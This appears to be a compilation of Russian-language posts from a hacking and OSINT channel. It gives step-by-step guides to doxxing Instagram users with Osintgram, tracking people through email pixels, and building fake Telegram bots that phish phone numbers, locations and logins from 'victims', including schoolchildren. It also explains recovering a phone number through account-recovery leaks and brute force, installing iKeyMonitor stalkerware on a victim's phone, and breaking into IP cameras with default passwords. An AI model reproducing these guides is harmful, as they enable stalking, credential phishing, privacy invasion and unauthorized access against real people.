https://i.gyazo.com/e4552a4cf50ebfea31b7e3f03bbe72cf.png

2. Нажимаем кнопку «Показать параметры» и выставляем галочку на пункте «Не спрашивать подтверждение перед тем, как показать и уничтожить записку».

https://i.gyazo.com/4ef99f56b61e1d2a5af7573a8d4d8b24.png


3. Указываем почту на которую придёт уведомление о прочтении и нажимаем «Создать записку».

4. Укорачиваем ссылку в любом сервисе и делаем её безобидной. Закинуть ссылку можно туда, где предполагаемо завелась крыса: например, переписки или заметки.

Вашего шпиона как-то надо забайтить на эту ссылку. Если это диалог, то тут уже включаем фантазию и пишем то, что может быть интересно для того, кто следит за сообщениями:

https://i.gyazo.com/c4ec5b135f44a39811e3fd4143c45cd1.png

ВАЖНО! Перед тем, как отправить ссылку в диалог обязательно предупредите собеседника в безопасном канале связи (а лучше лично), чтобы он не открывал ссылку, иначе план не сработает.



Таким образом, если кто-то перейдёт по ссылке, то вам на почту придёт оповещение, и вы узнаете, следит ли кто-то лишний за вашими переписками, документами, заметками и т.д.

https://i.gyazo.com/6701861d5d93cc8833c3ba524298a9d3.jpg

Вступить в наш чат



Наверняка, вы ни раз стирали историю браузера, а вместе с этим удаляли что-то важное. Или же хотели пошпионить за кем-то, узнав, какие сайты и страницы посещает человек. А, возможно, вы случайно удалили файл, и теперь думаете, что он безвозвратно потерян. Но это не так — у нас есть решение! Обычно, стирая историю или файл со своего внутреннего или внешнего диска, вы не удаляете их реальное содержимое; скорее, пространство, которое они занимали.


И сегодня мы расскажем вам о 3 способах, как восстановить историю браузера и случайно удалённые файлы с ПК.

https://i.gyazo.com/99cfe9562fa30bcfde820a7978d8b11e.png

Способ 1: использование командной строки и кэша DNS в Windows

Это немного технический метод, который дает нам имена всех доменов, которые мы посетили. Обратите внимание, что домены и скрипты, загруженные из рекламы, также будут показываться. Таким образом, вы можете получить кучу доменов.


Откройте командную строку или CMD с помощью панели поиска Windows.


https://i.gyazo.com/0491f84be871bfb349034bc07d48189f.jpg

Теперь в командной строке введите команду ipconfig /displaydns, как показано на изображении ниже, и нажмите Enter.

https://i.gyazo.com/068f68215d4a01fd4e39f3a9e4788289.jpg


Теперь вы можете увидеть все посещённые домены, однако нельзя посмотреть более подробную информацию о странице, только название конкретного сайта.\


https://i.gyazo.com/e4cc0ab1ad40ce967615c533fac16687.jpg

Способ 2: восстановление истории и файлов с помощью программы Recuva

Помимо вышеописанного способа, вы всегда можете использовать специальную программу, такую как Recuva. Она является бесплатной и поможет восстановить потерянные данные.

Скачайте программу и установите на свой компьютер.

https://i.gyazo.com/56e6567c07c4ca4d20fadc189fc3719e.jpg

Далее выберите какие файлы вы хотите восстановить.

https://i.gyazo.com/2c3aa22d70165201b1afba4282c96eb7.jpg

Файлы истории Google Chrome обычно хранятся по этому пути по умолчанию: C:\Users\Username\AppData\Local\Google\Chrome\User Data\Default.

Укажите любой другой диск, на котором будет производиться поиск потерянных файлов. Программа выполнит первичное сканирование, в результате которого покажет вам в удобной форме все недавно удаленные файлы, которые подлежат восстановлению.

https://i.gyazo.com/777d45c2c7ae1a94759ddaf0b8282a77.jpg

В меню параметров вы можете легко отфильтровать список, пропуская файлы весом ноль байт или скрытые документы.

Если результаты покажут файл с красным кругом, то восстановление невозможно; если же вы видите зеленый круг, то вы сможете восстановить данные почти с полной уверенностью. Оранжевый круг означает вероятность 50%.

https://i.gyazo.com/d1e8b9024ad66217c1e71055c9eaeae2.jpg

Способ 3: восстановление системы

Этот метод следует использовать только в крайнем случае, поскольку он откатит систему назад.

Перейдите в строку поиска и введите восстановление системы.

Выберите данную опцию, и вы увидите все точки восстановления на вашем устройстве.

https://i.gyazo.com/c2dbedd491fbd2acca6d3a5423a93fc6.jpg

Щелкните нужную точку восстановления и подтвердите. После согласия, все изменения, сделанные после этой точки восстановления, будут отменены, и ваши данные будут восстановлены.

https://i.gyazo.com/457d0f8201f5fcdde6af5b4bb0ad5cd1.jpg

https://i.gyazo.com/a268ea29fb8f6015b7a7b359ce90c04c.jpg

Вступить в наш чат

В сегодняшней статье мы расскажем вам как пробить пользователя Инстаграм с помощью одной лишь утилиты. Вы узнаете как выжать максимум полезной информации из профиля жертвы, зная только никнейм. Итак, начнём.

https://i.gyazo.com/231f760a836bf982b19ebb27c3313982.jpg

Мы не призываем вас к каким-либо действиям, статья написана исключительно в ознакомительных целях.

Что нужно для работы:

Программа, скачиваем на GitHub;

Python3 версии 3.6+;

Аккаунт инстаграма.

Osintgram

А поможет нам в этом утилита Osintgram. Это инструмент OSINT, позволяющий быстро собрать все данные о конкретной странице.

После скачивания приступим к установке, для этого введите команды:

git clone https://github.com/Datalux/Osintgram.git

cd Osintgram

pip install -r requirements.txt

Перед запуском утилиты вам потребуется создать и добавить аккаунт. Это нужно сделать в файле credentials.ini, который лежит в каталоге config, в папке с программой. Вводим логин и пароль своего аккаунта и сохраняем.

Не забудьте о своей безопасности, используйте левый профиль.

https://i.gyazo.com/772f78db79a2793321945d29555c815a.jpg

Далее можно приступить к использованию Osingram. Для начала давайте откроем справку:

python3 main.py -h

https://i.gyazo.com/e06027fd1a2889c1c8d8e4c1f7d2eb43.jpg

использование: main.py [-h] [-C] [-j] [-f] [-c COMMAND] [-o OUTPUT] id

Osintgram - это инструмент OSINT в Instagram. Он предлагает интерактивную оболочку для выполнения анализа аккаунта Instagram любого пользователя по его нику.

обязательные аргументы:

id имя пользователя

необязательные аргументы:

-h, --help показать это сообщение и выйти

-C, --cookies очистить предыдущие cookies

-j, --json сохранить результат в файл JSON

-f, --file сохранить результат в файл

-c COMMAND, --command COMMAND

запустить в однокомандном режиме и выполнить предоставленную команду

-o OUTPUT, --output OUTPUT

где хранить фотографии

Исходя из информации выше, нам нужно ввести только имя интересующего пользователя.

Так и делаем:

python3 main.py nickname

https://i.gyazo.com/67181b7c26bd1aab941a5b0c70bbe7b0.jpg

После успешного логина, видим список команд для сохранения результатов и приглашение к вводу. Чтобы увидеть команды для анализа профиля вводим: list

https://i.gyazo.com/e12031bdead5c4a0be45735236378f6a.jpg

Команды для Osintgram

Ниже представлен список команд, которые может выполнить утилита.

addrs - cобрать все адреса из фотографий цели (отметки мест в инсте);

captions - собрать все подписи к фотографиям цели;

comments - получить количество комментариев ко всем постам цели;

followers - собрать всех подписчиков цели;

followings - собрать всех, на кого цель подписана;

fwersemail - собрать email адреса подписчиков;

fwingsemail - собрать email адреса страниц, на которых подписана цель;

fwersnumber - собрать телефоны подписчиков;

fwingsnumber - собрать телефоны страниц, на которых подписана цель;

hashtags - собрать все хештеги, используемые целевой страницей;

info - собрать общую информацию о странице;

likes - получить суммарное количество лайков на странице;

mediatype - собрать посты по их типу (фото или видео);

photodes - собрать описания фотографий цели;

photos - скачать все фотографии с целевой страницы;

propic - скачать фотографии профиля целевой страницы;

stories - скачать все доступные сторис страницы;

tagged - собрать всех пользователей, упомянутых на странице по юзернейму;

wcommented - собрать всех пользователей, оставлявших комментарии на странице;

wtagged - собрать всех пользователей, кто упоминал страницу.

Трудно не заметить большие возможности Osintgram. Но для начала давайте узнаем общие данные о нашей цели. Вводим команду: info

https://i.gyazo.com/2d9666513fce7deb299f985542eb78ac.jpg

И уже видим полезную информацию. Но этого мало, поэтому предлагаем узнать номера телефонов пользователей, на которых подписана жертва.

Вводим: fwingsnumber. И Osintgram спросит хотим ли мы получить все возможные телефоны? Мы ограничимся лишь 10 для примера.

https://i.gyazo.com/a9fa3fcaef9b3732d0e093c4c6798d3a.jpg

И мы видим конкретный результат. Теперь проделываем тоже самое, но только с электронными почтами.

Вводим: fwingsemail

https://i.gyazo.com/cdefd364114d8e3a3533b236a9375501.jpg

И здесь Osintgram показал удовлетворительный результат. Остальные команды работают по аналогичному принципу. Ну а что, где и когда применять — решать вам.

Стоит также отметить, что результат мы можем сохранять в txt файл. Для этого перед запуском команд введите FILE=y.

Что касается закрытых аккаунтов, то тут программа пока бессильна. Для того, чтобы разведка сработала, вам заранее нужно заполучить подписку нашей цели, в значит включить в ход навыки социальной инженерии. На этом все. Удачи!

https://i.gyazo.com/cc0751d1212b554b36539bdaa233cae7.jpg

Вступить в наш чат

Пробив данных раньше был чем-то вроде привилегии — доступен только узкому кругу лиц. Многие до сих пор думают, что для этого нужны какие-то супер секретные программы, которых нет в открытом доступе.

Этой статьей разрушаем мифы, а также рассказываем об одном из самых простых способов пробива.

Сервис GetNotify

К сожалению или к счастью, в Интернете есть всё. Пользователь, однажды сюда попавший оставляет свой след, порой подробный настолько, что его без труда может отыскать каждый.

https://i.gyazo.com/62da338742ce3eeac6ae17a5609718d9.png

С помощью этого способа можно получить доступ к самой интересной информации: местоположение, IP-адрес и время у интересующего человека. Сервис уже хорошо знаком западным пользователям, но в руки к СНГ комьюнити попал не так давно.

Чтобы собрать необходимую информацию, отлично подходит сервис GetNotify. Он позиционирует себя как бесплатный инструмент для слежки, для которого требуется лишь адрес электронной почты.

Ежедневно тысячи пользователей получают и отправляют письма по электронной почте. GetNotify.com — это бесплатная служба отслеживания Email, которая уведомляет клиента, когда отправленное письмо прочитано.

Более того, сервис утверждает, что их техника отслеживания электронной почты невидима для получателя, что обеспечивает полную анонимность и развязывает руки для слежки.

Как это работает

Сервис добавляет в сообщение небольшое невидимое изображение, которое выполняет функцию трекера. И как только получатель откроет такое письмо, то детективу, решившему опробовать сервис, сразу придет уведомление о прочтении.

Однако, на этом чудеса не заканчиваются. GetNotify по доброте душевной щедро поделится и другой более полезной информацией, которую ему удалось раздобыть:

IP-адрес получателя

географическое местоположение

часовой пояс

операционная система

используемый браузер

https://i.gyazo.com/9478cdc1d64e06ee4433c5dbe9ad2675.png

Важно, что сервис предоставляет такие услуги бесплатно. Чтобы начать слежку, достаточно зарегистрироваться на сайте и ввести Email жертвы. Всё остальное сервис выполнит сам.

https://i.gyazo.com/bb1c2e366905c7dee534c48a487ea0ff.jpg

Вступить в наш чат

В телеграме существует огромное количество ботов, которые предлагают различные услуги: пробив, накрутка, знакомства и т.д. Но знаете ли вы как создать собственного поддельного бота для деанонимизации? Сегодня мы рассмотрим инструмент Dnnme2 для пробива пользователей телеграм.

Оставайтесь с нами, и вы узнаете, что это очень просто.

https://i.gyazo.com/f77dd18c8bf2dfc2e12fc85265c0bdc3.jpg

Вся информация в этой статье предоставлена исключительно в ознакомительных целях. Мы не несем ответственности за ваши действия.

Что значит поддельный бот

Это фейк-бот, который внешне ни чем не отличается от обычного бота, предоставляющего какие-то услуги (накрутку, пробив, донаты, знакомства). Разница лишь в том, что пользователь не получает того, за чем обратился к боту, а вместо этого, сам того не подозревая, сливает личные данные о себе, которые сразу отправляются к вам. Таким образом, вы можете узнать номер телефона, точную геолокацию пользователя и другую персональную информацию. И все это бесплатно.

Что потребуется:

Python;

Телеграм (Не используйте свой основной аккаунт).

Установка DNNME

Для того, чтобы установить программу, поочередно введите следующие команды в командную строку:

git clone //github.com/lamer112311/Dnnme2

cd Dnnme2

pip install -r requirements.txt

python build.py

https://i.gyazo.com/d22008f1149e4cfeb01e16dd686467af.jpg

Далее вас попросят ввести ваш Telegram ID, чтобы узнать его переходим в бота @my_id_bot и вводим команду: start.

После этого бот выдаст вам ваш ID, он нужен для того, чтобы бот вам мог присылать данные тех, кто пользовался данным ботом.

Создаем бота

После этого нам нужно создать бота для деанона. Для этого:

Переходим в BotFather (https://forum.antichat.xyz/members/808530/) и выбираем: newbot;

Вводим любое имя боту (можно на русском);

Вводим юзернейм боту с окончанием bot;

Далее вы получите ссылку на нашего бота и токен (он обведен красным);

Копируем токен, который обведен красным на скриншоте ниже;

Переходим по ссылке на бота и нажимаем: start.

https://i.gyazo.com/94f60c03e4205805a4b690834810830d.jpg

Режимы бота:

Пробив по номеру - это фейк-бот для пробива. Как только жертва зарегистрируется в боте, бот автоматически соберёт данные: номер, ID, имя пользователя. Кроме того, в боте есть запрос на геолокацию, информация о которой тоже поступит прямиком к вам.

Накрутка инстаграм - фейк-бот, который используется в качестве инструмента для накрутки инстаграма. Жертва, желающая накрутить лайки и подписчиков, регистрируется в боте, отправляя боту свои данные для входа. Однако, в боте нет запроса на геолокацию.

Бравл старс - бот, охватывающий, по большей части, только школьников. Исходя из практики, 90% пользователей, играющих в Brawl Stars готовы отправить любую информацию для получения доната на свой аккаунт. Бот присылает номер телефона и геолокацию жертвы.

Знакомства - фейк-бот для знакомств. На наш взгляд, самый эффективный бот, поскольку собирает не только контакты и данные о местоположении, но и личную информацию, которую жертва заполняет в виде анкеты о себе.

Итак, выбираем любой, из выше предложенных шаблонов. И для активации бота, вводим:

python probiv.рy (в зависимости от выбранного режима).

https://i.gyazo.com/0b24b67b3d2076757cbbfc82e960fd0a.jpg

Заходим к нашему боту, по указанному ранее адресу, и следуем его инструкциям.

После чего, скидываем жертве нашего бота, используя социальную инженерию.

Пример работы бота

Полученные данные о жертве будут приходить в ваш телеграм и в терминал:

https://i.gyazo.com/11206536a34d5d5836a0b8cb780eff8c.jpg

https://i.gyazo.com/9ee07a244a1d27e6701bd04c1bfe52d5.jpg

Информация о геолокации приходит вместе с координатами на Гугл картах:

https://i.gyazo.com/5a76d45c561014c67a9ead8aae6b562f.jpg

На это все. Удачи в разведке!

https://i.gyazo.com/a348aeb31783754621259525c2a2daeb.jpg

Вступить в наш чат

Думаете, что вычислить номер телефона с нуля невозможно? Вы будете приятно удивлены, узнав, что это не так. Мы проявили немного изобретательности и ловкости, и нашли действенный способ. И сегодня мы вам о нем поведаем.

https://i.gyazo.com/6a14fce0d2dc2077c153eb93d1be52b0.jpg

Для того, чтобы узнать номер телефона человека, вы должны знать его:

email;

инстаграм;

вк.

Хотя другие соц. сети и аккаунты нам тоже могут помочь. Читайте до конца.

Собираем пазл из цифр телефона

Этот способ представляет из себя собирание пазла по кусочкам. Да, он требует усилий и вашего времени, но результат себя оправдывает.

1) Первые 5 кусочков пазла или же 5 цифр номера телефона мы можем получить из восстановления почты.

Безусловно, для этого вам нужно знать имейл пользователя, чей телефон вы пробиваете.

https://i.gyazo.com/15160128cad266af832958477351d755.jpg

Восстановление mail.ru почты даст нам первые 5 цифр (на доменах list, bk, mail, inbox, internet). Таким образом, получаем: +79998******.

2) Следующие 2 цифры получаем методом перебора в почте. Но тут стоит отметить, что, после 10 попыток почта ставит ограничение на час (поэтому максимально понадобится времени ~9 часов) Теоретически, вы можете просидеть и дольше, чтобы узнать 3-4 следующие цифры, но в этом уже нет особого смысла, так как есть способ быстрее.

Получаем: +7999890****

https://i.gyazo.com/935491a53f4bba0898119af1f94948ec.jpg

3) Последние 2 цифры можно получить через восстановление этих соц.сетей:

• Instagram (только в приложении, по аккаунту/почте)

Нужно нажать по своему логину в Instagram и выбрать «Добавить аккаунт», затем «Войти в существующий аккаунт».

В следующем окне выбираем «Забыли пароль?» и далее вводим логин профиля. Готово. Теперь мы имеем последние 2 цифры телефона.

https://i.gyazo.com/069904c8c9237f80d241e29f50f0331a.jpg

• Google (по аккаунту/почте + ФИ)

• Microsoft (по аккаунту/почте)

• Facebook (по полному имени/почте)

Получаем: +7999890**55

4) Оставшиеся 2 цифры можно перебрать по "номеру телефона", всего 100 вариантов:

• Skype (в начале проверяется почта, а потом по номеру ищется этот же аккаунта, ограничения не известны)

• Microsoft (ограничения не известны)

• Google (ограничения не известны)

• Facebook

• Сбербанк (15 попыток перевода)

• ВК (нужен сам аккаунт, капча на каждую проверку)

Остаётся только проверить полученный номер телефона на валидность.

Вуаля. Пазл собран.

https://i.gyazo.com/7d010857138f22d218a35a383bc891ac.jpg

Вступить в наш чат

Хотите узнать с кем человек ведёт переписки в телефоне, какие сайты посещает и где он находится в данный момент? Вы можете отслеживать ВСЕ его действия в телефоне 24/7. И сегодня мы расскажем вам как установить слежку в телефоне с помощью приложения iKeyMonitor. Оно доступно как на Android, так и на iOS устройствах.

Вся информация в этой статье предоставлена исключительно в ознакомительных целях. Мы не несем ответственности за ваши действия.

https://i.gyazo.com/08bdca57364fce41d634f7adb2c2d006.jpg

iKeyMonitor

Что это за программа

Данное приложение было разработано для родительского контроля за телефоном ребёнка, но тем не менее оно широко вошло в обиход среди любителей пошпионить за телефоном других пользователей.

Стоимость

Стоит отметить, что приложение является платным, но имеет 30 дневный бесплатный пробный период. Если вам оно не нужно на постоянной основе, то пробного периода вполне будет достаточно, чтобы вывести жертву на чистую воду.

Ну а если вы захотите продлить, то стоимость подписки следующая:

https://i.gyazo.com/5fa53dc91fcdb4b0b90d4be8d481d031.jpg

Месяц полного мониторинга обойдётся вам примерно в 3700р.

Как работает

https://i.gyazo.com/b5fd1c7537c69cf9f33f4400c938258e.jpg

1. В отличие от других приложений для мониторинга, которые могут отслеживать действия только конкретных приложений, iKeyMonitor контролирует абсолютно каждое приложение, записывая нажатия клавиш.

2. Приложение позволяет удаленно делать фотографии и скриншоты в режиме реального времени. Вы сможете видеть, что окружает жертву в данный момент.

3. Функция Ambient Listening & Recording позволяет записывать и слушать окружающие звуки в режиме реального времени.

4. iKeyMonitor записывавает сообщения и сразу отправляет их вам. Даже если жертва сразу удалит переписку, сообщения останутся у вас в истории.

5. Удаленно записывает входящие и исходящие звонки с помощью встроенного диктофона.

6. И, конечно, же отслеживает любую активность в приложениях.

https://i.gyazo.com/0895eced48cc87f221f33f33881e0bf6.jpg

Регистрация

Выберите тип устройства жертвы.

https://i.gyazo.com/0bc15a7be58a55f250355d7d0496998c.jpg

При этом приложение спросит, есть ли у вас доступ к девайсу, за которым вы хотите установить слежку. Вам придётся применить СИ, чтобы установить программу на телефон жертвы.

https://i.gyazo.com/1b908afe1aaaddf97c7e2eefc7224188.jpg

https://i.gyazo.com/7cc80286bf81b6985050bee218c0d264.jpg

Проверьте почту для подтверждения регистрации.

После этого выполните вход и вы увидите панель, которая выглядит следующим образом:

https://i.gyazo.com/981688f87dae923da79767240f20d4f4.jpg

Готово! Теперь ничто не ускользнёт от вашего взора.

https://i.imgur.com/XmKpcYp.jpg

Вступить в наш чат

В наши дни уже невозможно найти человека в Интернете, у которого нет ни единого профиля в соцсетях. Как правило, пользователи выкладывают много личной информации и контента: фото, видео, образование, круг общения и даже геолокацию. Другими словами, они делают себя доступной мишенью для злоумышленников. Но как же быстро найти и собрать все эти данные о человеке?

Сегодня мы расскажем о полезном инструменте, без которого не обойтись начинающему OSINTеру при сборе информации в социальных сетях.

https://i.imgur.com/PdYoerP.png

Social Analyzer

Social Analyzer находит профили в более чем 1000 социальных сетях. Инструмент содержит различные модули анализа и обнаружения, и вы можете выбрать, какие модули использовать в вашей разведке.

Основан на технологии OSINT, что означает технологию разведки с открытым исходным кодом. Этот инструмент позволяет пользователям находить потенциальные профили человека в более чем 1000 социальных сетях, веб-сайтах и веб-приложениях. Social Analyzer использует различные модули анализа для поиска профилей человека, поэтому так активно используется многими правоохранительными органами для расследования киберпреступлений.

Подготовка

Для работы вам, конечно же, понадобится Kali Linux.

Устанавливаем Kali Linux,

Скачиваем на GitHub Social Analyzer.

Этот инструмент написан на python, поэтому в вашем Kali Linux должен быть установлен python.

Установка

Откройте терминал операционной системы Kali Linux и используйте следующую команду для установки инструмента:

https://i.imgur.com/PxKnb5V.jpg

Инструмент был установлен в Kali Linux. Теперь посмотрим, как он работает на примере.

Используя социальный анализатор, найдите данные о человеке в самых популярных соц. сетях. Для этого введите команду с ником или именем пользователя.

social-analyzer --username "nickname" --metadata

https://i.imgur.com/rZAY4hO.jpg

Готово. Утилита нашла все совпадения никнейма пользователя в самых популярных социальных сетях и собрала метаданные о нем. Как видите, инструмент очень прост в использовании. Удачи!

https://i.gyazo.com/096cd63ac710b3b21b419829567d46c6.jpg

Вступить в наш чат

В Интернете нас окружает множество ситуаций, ставящих под угрозу нашу безопасность, поэтому мы находимся в вечной погоне за анонимностью, но действительно ли мы анонимны? Малейшая ошибка, невнимательность и ваша личность будет раскрыта. Но существует инструмент, который поможет оставаться вам в тени при любых обстоятельствах, и название ему — WHOAMI. Он обеспечивает повышенную конфиденциальность и анонимность при использовании Linux ОС.

https://i.gyazo.com/176027169ce547fbde95fc46b95eaa2d.jpg

Установка

Прежде чем мы начнем устанавливать этот инструмент на наш Linux, мы должны проверить несколько инструментов, которые являются обязательными для этого инструмента, такие как: -tar, git, tor, curl, python3, python3-scapy.

Как правило, они уже установлены в нашем Linux, но если у вас их нет, вы можете просто запустить следующую команду:

sudo apt update && sudo apt install tar tor curl python3 python3-scapy network-manager

Можем двигаться дальше. Введите в терминале:

git clone https://github.com/omer-dogan/kali-whoami

Теперь измените директорий на kali-whoami:

sudo make install

И после этого наш инструмент готов к использованию, мы можем открыть его интерфейс, выполнив эту команду:

sudo kali-whoami --help

https://i.gyazo.com/da48f5ac4cadb0c563fe29684de2113a.png

Запускаем инструмент с помощью этой команды:

sudo kali-whoami --start

https://i.gyazo.com/d63b6871a5bae314f20246b21aeb5ab2.png

Здесь мы должны выбрать параметры, которые мы хотим включить, для этого просто выберите цифру для включения, а если вы хотите отключить, то нажмите этот номер еще раз.

https://i.gyazo.com/7b90e55d1561b105ae6a68c03de1e0c6.png

После включения, у вас появится галочка рядом с номером, значит, что защита работает, и вы анонимны.

Опции

Ниже приведены возможности инструмента:

1. Anti Mitm — блокирует Mitm-атаку. Mitm или man-in-the-middle - это атака, когда злоумышленник пропускает трафик жертвы через себя, то есть получает доступ к вашему логину, паролю, а еще ведёт прослушку и многое другое.

2. Log Killer — с помощью log killer вы удалите все ваши журналы, логи.

3. IP changer — тут все элементарно, скрипт меняет ваш айпи.

4. DNS changer — помогает изменить DNS сервер, используемый при подключении к сети.

5. Mac changer — даёт возможность сменить MAC-адрес компьютера.

6. Timezone changer — установка иного часового пояса.

7. Hostname changer — задаёт другое имя хоста (имя компьютера), чтобы нельзя было идентифицировать в сети.

8. Browser anonymization — после включения этой функции мы напрямую подключаемся к браузеру tor и можем анонимно сёрфить.

9. Anti cold boot — предотвращает атаку методом холодной перезагрузки, при которой хакер может извлекать из вашего ПК ключи шифрования и другие ценные данные.

Как видите, возможности внушающие, вам лишь остаётся определиться с нужными именно вам опциями и просто подключить их.

Чтобы проверить статус подключения, используйте следующую команду:

sudo kali-whoami --status

https://i.gyazo.com/193d8fdc1a5353f852b8ac9b9d3588ea.png

Инструмент поможет оставаться вам анонимными до тех пор, пока вы его не отключите, выполнив следующую команду:

sudo kali-whoami --stop

https://i.gyazo.com/1883c1bb324f67a3ef19d189b83b4184.png

На этом все. Удачи!

https://i.gyazo.com/286eba23e0bed4421f8692d0ca1bdcfe.jpg

Вступить в наш чат

В этой статье речь пойдет о создании токена, а именно ERC-20. Используя генератор токенов Token Generator dApp на платформе SmartContracts Tools вы можете за несколько минут создать новый токен на блокчейне Ethereum или BNB.

https://i.gyazo.com/73aaf7e8d1e95d3e924fa43d540bba6b.jpg

Переходим на сайт SmartContracts Tools и выбираем Token Generator.

Для создания токена необходимо подключиться к платформе MetaMask. На данный момент в сервисе можно найти несколько тарифных планов. У вас есть возможность сделать токен HelloÈRC20 за бесплатно, SimpleERC20 будет стоить 0,03 ETH, а за PowerfulERC20 придется заплатить 0,5 ETH. Можно выбирать дополнительные функции для увеличения эмиссии, дефляционных свойств и т.д.

https://i.gyazo.com/e99b4bb25ba207c6bcc3b71df192d7b8.jpg

Вам нужно указать тип токена и блокчейна, на котором он будет размещен. На данный момент доступны к использованию ERC20-токены с использованием Ethereum и PolyGon, а также BEP20-токены на базе Binance SmartChain.

При выборе ETH, вы можете развернуть токен в основной сети или на тестовой сети Sepolia.

А дальше все просто: выбираем новому токен название и знак, которые он будет иметь.

Указываем характеристики эмиссии: ограниченная, фиксированная или бесконечная. Далее указываем кто получает доступ к токену. Также можно указать роль администратора или ответственного по эмиссии.

В любом случае, даже если вы выбрали бесплатный тариф, вам придется заплатить за газ.

Как только все поля будут заполнены, появится надпись “Создать токен”, подтверждаем и становимся счастливыми обладателями собственного цифрового актива ERC-20, который имеет верифицированный код смарт-контракта.

https://i.gyazo.com/20438986741c93a48060fee4aba923a9.png

Вот так просто, за два клика можно создать собственный токен. Дальнейшее использование зависит лишь от вашей фантазии и необходимой задачи. Пользуйтесь с умом и следите за новыми статьями! На этом все. Удачи!

https://i.gyazo.com/0c3b70d7c9490a270f3c792022643118.jpg

Вступить в наш чат

Любой пользователь сети может стать жертвой сниффинга. Хакеры все чаще используют анализаторы траффика для взлома, поскольку они славятся своей простой и эффективностью. Когда речь заходит про снифферы, у многих возникает путаница в терминологии и непонимание, как это работает. Сегодня мы постараемся подробно все рассказать.

Поехали!

Что это такое

Сниффер (от англ. sniff - нюхать) — это программа для перехвата и анализа данных в сети.

https://i.gyazo.com/ce1b834e5bef3fdd91aee715510b638c.gif

Для чего нужно

Как правило, снифферы используются во благо, т.е. для анализа трафика с целью выявления и устранения отклонений в процессе работы. При этом хакеры нашли им другое применение, которое может нанести вред обычным пользователям. Так, они могут использовать их для перехвата логинов, паролей и другой необходимой им информации. Злоумышленники чаще всего ставят снифферы в местах, где есть незащищенное подключение Wi-Fi: кафе, аэропорты, ТРЦ.

Виды снифферов

Выделяют два вида снифферов:

локальный сниффер

онлайн сниффер

В зависимости от типа, снифферы могут передаваться онлайн, например, в виде ссылок или устанавливаться непосредственно на компьютер.

Сниферры могут быть разных видов, но все их объединяет одно — перехват траффика.

Обзор снифферов

CommView

Декодирует пакеты передаваемой информации, а затем выдает статистику используемых протоколов.Он может собирать информацию о трафике IP-пакетов. Также он может работать с популярными протоколами.

Сниффить данные можно при помощи вкладки «Текущие IP-соединения», где вы можете создавать дубликаты адресов.

Spynet

Spynet выполняет функции декодирования пакетов, их перехвата. С его помощью можно воссоздать страницы, которые посещает пользователь. Интерфейс просто в использовании. Для перехвата данных необходимо запустить программу Capture Start. Так же программа является бесплатной.

BUTTSniffer

BUTTSniffer анализирует непосредственно сетевые пакеты. Принцип работы — это перехват передаваемых данных, а так же возможность их автоматического сохранения на носителе, что очень удобно. Запуск данной программы происходит через командную строку.

Помимо этих программ-снифферов, существует множество других, не менее известных: CooperSniffer, WinDump, Ne Analyzer, dsniff, NetXRay, NatasX, LanExplorter.

Как защититься

Обнаружить сниффер гораздо проблематичнее, чем сразу принять меры по защите от него.

Регулярно делайте проверки на наличие уязвимостей в локальной сети;

Избегайте Wi-Fi подключения в общественных местах;

Используйте антивирус со сканером сети, распознающий снифферы;

Задайте сложные уникальные пароли;

Зашифруйте каналы связи с помощью криптографических систем.

Вывод

Как вы могли заметить из данной статьи, пользователь сам решает в каких целях ему использовать сниффер - во благо или для хакинга. Как бы то ни было, мы желаем вам удачи! Надеемся, что данная информация была полезной.

https://i.gyazo.com/bea796edb7fd12f0c79ed5047ffd2d86.jpg

Вступить в наш чат

Хотите узнать, как хакнуть камеру видеонаблюдения? Тогда вы пришли по адресу. В этой статье мы расскажем, как хакеры проникают в системы видеонаблюдения, поделимся с вами сайтом со взломанными камерами со всего мира и шаг за шагом научимся находить и устанавливать слежку за IP-камерами с помощью Angry IP Scanner.

https://i.gyazo.com/aafb3766a3a8e72ce549a77de5e2df49.jpg

Дисклеймер: Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.

Способы взлома

Существуют различные способы по взлому камер видеонаблюдения. Давайте подробно рассмотрим их:

Способ № 1: Сайты со взломанными камерами

Это самый простой метод для ленивых. На самом деле это не взлом, так как вам ничего взламывать не нужно, за вас уже все сделали другие. Просто используйте специальные сайты, на которых уже собраны тысячи взломанных камер по всему миру. Заходите и наблюдайте.

Эти веб-сайты созданы хакерами, которые проникают в камеры видеонаблюдения и предоставляют вам плоды своей работы бесплатно. Помимо этого, вы можете отсортировать камеры по производителям, странам, городам, часовым поясам и т.д. Ниже приведен пример камер видеонаблюдения, установленных в торговых центрах:

https://i.gyazo.com/91a69089cec927c47a6aa8f83624ef00.jpg

Нажмите здесь, чтобы перейти на сайт.

Способ № 2: Взлом IP-камеры

Что такое IP-камера

IP-камера - это цифровая видеокамера, представляющая из себя видеокамеру и компьютер, объединённые в 1 устройство. Захват и передача происходят в режиме реального времени через сеть, позволяя удалённо просматривать, хранить и управлять видеопотоком на базе IP.

Это способ нельзя назвать взломом, так как мы будем действовать иначе. Многие владельцы камер не сильно заморачиваются с установкой пароля для видеокамеры и просто используют заданный пароль по умолчанию. Суть данного метода заключается в том, чтобы заглянуть в руководство к IP-камере и найти стандартный пароль. Для этого вам просто нужно найти нужную камеру видеонаблюдения.

Как найти нужную камеру

Прежде чем вы попробуете ввести пароль, вам нужно найти камеру в Интернете. И в этом нам поможет программа Angry IP Scanner.

Давайте узнаём, как работает этот способ изнутри:

https://i.gyazo.com/58a9d374e58b5be0d56d94d9c32b71c4.jpg

Сетевой сканер (Angry IP Scanner) используется для получения информации от маршрутизатора, который находится в Интернете.

https://i.gyazo.com/ccbf49e7e557c64245baf47f0e45d111.jpg

Сам же маршрутизатор выступает в роли проводника, т.е. он не скрывает информацию, а наоборот предоставляет ее при соответствующем запросе. Мы можем сравнить этот процесс с обычным магазином, владелец которого демонстрирует покупателям товар, при этом держит в тайне, где он хранит ключи.

Angry IP Scanner

Шаг 1 - Загрузите Angry IP Scanner. Нажмите здесь, чтобы загрузить сканер Angry IP для вашей операционной системы: Windows, Mac или Линукс. Убедитесь, что у вас скачена и установлена последняя версия Java.

https://i.gyazo.com/59fbcc1c62fd178765e77893beb00e38.jpg

Шаг 2 - Установите Angry IP Scanner. Установка очень проста, вам просто нужно запустить установочный файл и следовать инструкциям, как показано на изображениях ниже:

https://i.gyazo.com/bf7a7c29c5f216c9cdc5655b7185a636.jpg

Шаг 3 - Настройте порты и сборщик Angry IP Scanner. Чтобы иметь возможность находить нужную нам информацию для взлома камер, необходимо выполнить настройку. Смотрите скриншот ниже:

https://i.gyazo.com/ab00dd033d0ebfee8e90ef4c397f49d0.jpg

